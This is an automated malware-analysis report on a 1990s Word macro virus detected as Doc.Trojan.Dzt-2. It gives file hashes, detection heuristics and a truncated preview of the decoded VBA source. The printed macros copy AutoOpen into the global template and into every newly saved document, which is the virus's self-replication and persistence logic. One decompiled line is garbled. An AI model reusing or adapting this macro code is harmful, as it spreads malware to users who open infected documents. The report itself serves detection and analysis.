Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4a41b97c1984be6c…

MALICIOUS

Office (OLE)

37.0 KB Created: 1998-01-01 00:54:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 91ea05540c935585638669a1621802cf SHA-1: c54e7f03d49508f92857fd468422e017422ccea8 SHA-256: 4a41b97c1984be6ca865b5bf3a4967378a18e55de6568c9092c6c2ee69060c59
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV and contains legacy WordBasic auto-exec markers and VBA macros. The AutoOpen macro is present, suggesting an attempt to automatically execute malicious code upon opening. The VBA code includes logic to copy macros, indicating a potential mechanism for persistence or further payload execution, though the exact target is unclear.

Heuristics 4

  • ClamAV: Doc.Trojan.Dzt-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Dzt-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15978 bytes
SHA-256: 6bce6e4ce1ebdad64c795f64e670d67fb86dcfcc0a7af97b1768d67d7b2daf48
Detection
ClamAV: Doc.Trojan.Dzt-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "FileSaveAs"

Dim Filebaru$, FileMacro$
Dim salah

Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves a copy of the document in a separate file"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSaveAs.MAIN"
Filebaru$ = ""
FileMacro$ = ""
salah = 0
WordBasic.DisableInput (1)
WordBasic.Unrecognized_Statement63798       Let                To     -1  String -1  >= -1   +1   +1  -1+1  'EndIf +1   : Redim   : Redim : Redim   Alias : Redim   Resume : Redim   : : Redim   Let : Redim    : Dim       Case _
  , Unrecognized_Argument49282  -    Step               : Redim                    Single        Select    Is       *    Then    Name      Select      Select      Select      Select      Select      Select      Select      Select      Select      Select      Select      Select      Select      Name      Name      Select      Name      Name      Name      Name      Select      Select      Select      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name                 <=    Open                   )
salah = Err.Number
End Sub

Private Sub CopyAOtoG()
On Error GoTo -1: On Error GoTo finish
WordBasic.MacroCopy FileMacro$ + ":AutoOpen", "Global:FileSave", 1
finish:
End Sub

Private Sub CopyAOF()
On Error GoTo -1: On Error GoTo finish
    WordBasic.MacroCopy "Global:FileSave", Filebaru$ + ":AutoOpen", 1
finish:
End Sub

Private Sub Aksi()
On Error GoTo -1: On Error GoTo finish
WordBasic.FileSummaryInfo Comments:="DZT'96" + Chr(13) + "(c)9 April 1996 by Hikmat S/D0E94328" + Chr(13) + "comp. dept. of HFT" + Chr(13) + "Instrumentasi Elektronika" + Chr(13) + "MIPA Terapan Fakultas MIPA" + Chr(13) + "Universitas Padjadjaran" + Chr(13) + "Bandung"
finish:
End Sub


Attribute VB_Name = "FileSave"

Dim formatfile, salah
Dim Filebaru$

Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves the active document or template"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSave.MAIN"
Dim Ukuran$
Dim Rev$
Dim Ls$
formatfile = 0
salah = 0
Filebaru$ = ""
WordBasic.DisableInput (1)
WordBasic.DisableAutoMacros (1)
On Error GoTo -1: On Error GoTo finish
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.DocumentStatistics(False)
WordBasic.CurValues.DocumentStatistics dlg
Ukuran$ = UCase(dlg.FileSize)
Rev$ = dlg.Revision
Ls$ = dlg.LastSaved
If (Ukuran$ = "0 BYTES") Or (Rev$ = "1") Or (Ls$ = "") Then SaveTo
If (Ukuran$ <> "0 BYTES") Or (Rev$ <> "1") Or (Ls$ <> "") Then SaveFile -1
finish:
If Err.Number = 509 Then SaveTo
End Sub

Private Sub SaveTo()
Dim fileFormat
On Error GoTo -1: On Error GoTo finish
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
formatfile = dlg.Format
Filebaru$ = dlg.Name
WordBasic.FileSaveAs dlg
finish:
If ((Err.Number = 0) And (fileFormat < 2)) Then SaveFile (0)
End Sub

Private Sub SaveFile(cek)
On Error GoTo -1: On Error GoTo finish
If cek Then
    Filebaru$ = WordBasic.[FileName$]()
    CekFormat
End If
If formatfile = 1 Then CopyToFile
If formatfile = 0 Then
    WordBasic.FileSaveAs Name:=Filebaru$, Format:=1
    CopyToFile
End If
finish:
If salah = 0 Then
    Aksi
    WordBasic.FileSave
End If
End Sub

Private Sub CekFormat()
On Error GoTo -1: On Error GoTo finish
Dim dlog As Object: Set dlog = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlog
formatfile = dlog.Format
finish:
If Err.Number <> 0 Then formatfile = Err.Number
End Sub

Private Sub CopyToFile()
On Error GoTo -1: On Error GoTo finish
CekCopyToFile
If salah 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.